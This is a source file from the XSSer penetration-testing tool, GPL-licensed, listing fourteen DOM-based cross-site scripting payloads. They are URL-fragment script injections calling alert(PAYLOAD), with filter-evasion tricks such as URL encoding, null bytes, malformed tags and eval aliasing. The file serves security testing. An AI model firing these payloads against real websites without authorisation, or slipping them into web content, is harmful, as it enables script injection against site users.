123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566 |
- """
- This file is part of the XSSer project, https://xsser.03c8.net
- Copyright (c) 2010/2020 | psy <epsylon@riseup.net>
- xsser is free software; you can redistribute it and/or modify it under
- the terms of the GNU General Public License as published by the Free
- Software Foundation version 3 of the License.
- xsser is distributed in the hope that it will be useful, but WITHOUT ANY
- WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- details.
- You should have received a copy of the GNU General Public License along
- with xsser; if not, write to the Free Software Foundation, Inc., 51
- Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
- """
- DOMvectors = [
- { 'payload':"""Y#<script>alert('PAYLOAD')</script>""",
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':"""Y#<%<!--'%><script>alert(PAYLOAD);</script -->""",
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':"""Y#<script ^__^>alert(PAYLOAD)</script ^__^""",
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':'''Y#<script src="data:text/javascript,alert(PAYLOAD)"></script>''',
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':"""Y#<script>+-+-1-+-+alert(PAYLOAD)</script>""",
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':"""Y#<script x> alert(PAYLOAD) </script 1=2""",
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':'''Y#<script>a=eval;b=alert;a(b(/ PAYLOAD/.source));</script>'">''',
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':'''Y#<script/y~~~>;alert(PAYLOAD);</script/Y~~~>''',
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':'''Y#%00“><script>alert(PAYLOAD)</script>''',
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':'''Y#%22%3E%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''',
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':'''Y#%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''',
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':'''Y#`"><%3Cscript>javascript:alert(PAYLOAD)</script>''',
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':'''Y#%3Cscript>javascript:alert(PAYLOAD)</script>''',
- 'browser':"""[Document Object Model Injection]"""},
- { 'payload':"""Y#<SCRIPT>a=/PAYLOAD/alert(a.source)</SCRIPT>""",
- 'browser':"""[Document Object Model Injection]"""}
- ]
|